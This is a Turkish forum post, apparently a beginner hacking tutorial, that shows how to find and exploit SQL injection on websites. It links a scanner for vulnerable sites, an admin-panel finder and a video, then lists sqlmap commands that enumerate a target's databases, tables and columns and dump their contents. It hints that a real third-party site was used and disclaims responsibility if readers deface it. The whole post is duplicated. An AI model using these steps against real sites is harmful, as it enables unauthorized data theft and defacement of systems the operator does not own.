- 20 May 2019
- 8
- 2
Herkese Merhaba.
Bu konuda açık aramayı ve istismar etmeyi gösterdim sql injection ile. Başka zafiyet istismarı ya da başka birşey özellikle
öğrenmek isterseniz yorumlara yazın konuyla ilgili konu başlatırım. İlk videolu dersimdi biraz gergindim kusura bakmazsınız umarım.
Web sitesine zarar vermek gibi bir amacım yoktu eğer siz özel olarak buraya index gibi zarar vermeyin eğer verirseniz benim sorumluluğumda değil. Zarar vermeniz önerilmez. Konuya geçelim o zaman.
sqliv https://github.com/the-robot/sqliv.git
breacher https://github.com/s0md3v/Breacher.git
video:
https://youtu.be/xEvMR0XlTP0
Komutlar: (dedğim gibi ilk videolu dersimdi biraz sıkıntı oldu diğer videolarla olmaz. Videoda gözükmemiş bunlar.)
sqlmap -u <url> --dbs (database görüntüler)
sqlmap -u <url> -D <database ismi> --tables (databasedeki tablelerı görüntüler)
sqlmap -u <url> -D <database ismi> -T <table ismi> --columns (tabledeki kolumları görüntüler)
sqlmap -u <url> -D <database ismi> -T <table ismi> -C <column ismi yada isimleri> --dump (kolumdaki bilgileri dump eder)
Bu konuda açık aramayı ve istismar etmeyi gösterdim sql injection ile. Başka zafiyet istismarı ya da başka birşey özellikle
öğrenmek isterseniz yorumlara yazın konuyla ilgili konu başlatırım. İlk videolu dersimdi biraz gergindim kusura bakmazsınız umarım.
Web sitesine zarar vermek gibi bir amacım yoktu eğer siz özel olarak buraya index gibi zarar vermeyin eğer verirseniz benim sorumluluğumda değil. Zarar vermeniz önerilmez. Konuya geçelim o zaman.
sqliv https://github.com/the-robot/sqliv.git
breacher https://github.com/s0md3v/Breacher.git
video:
https://youtu.be/xEvMR0XlTP0
Komutlar: (dedğim gibi ilk videolu dersimdi biraz sıkıntı oldu diğer videolarla olmaz. Videoda gözükmemiş bunlar.)
sqlmap -u <url> --dbs (database görüntüler)
sqlmap -u <url> -D <database ismi> --tables (databasedeki tablelerı görüntüler)
sqlmap -u <url> -D <database ismi> -T <table ismi> --columns (tabledeki kolumları görüntüler)
sqlmap -u <url> -D <database ismi> -T <table ismi> -C <column ismi yada isimleri> --dump (kolumdaki bilgileri dump eder)